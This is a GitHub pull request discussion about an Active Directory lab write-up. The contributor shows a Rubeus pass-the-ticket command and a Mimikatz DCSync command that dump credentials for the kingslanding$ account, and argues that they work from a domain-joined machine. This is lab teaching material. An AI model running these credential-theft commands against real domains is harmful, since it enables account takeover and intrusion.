Skip to content

Conversation

@Anon-Exploiter
Copy link

The current article states:

Another way of exploitation, is to do a ptt with Rubeus and launch a dcsync with Mimikatz but this implies to run Mimikatz on Winterfell and bypass the defender AV

From what I've seen, this is actually doable on a domain-joined machine as well and we do not have to run Rubeus on the Winterfell DC.

.\Rubeus.exe ptt /ticket:doIFrzCCBaugAwIB......
.\mimikatz.exe "lsadump::dcsync /domain:sevenkingdoms.local /user:kingslanding$" "exit"

image

@Anon-Exploiter
Copy link
Author

Created a blank VM and domain joined it using credentials of one of the user's from North DC.

image

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment

Labels

None yet

Projects

None yet

Development

Successfully merging this pull request may close these issues.

1 participant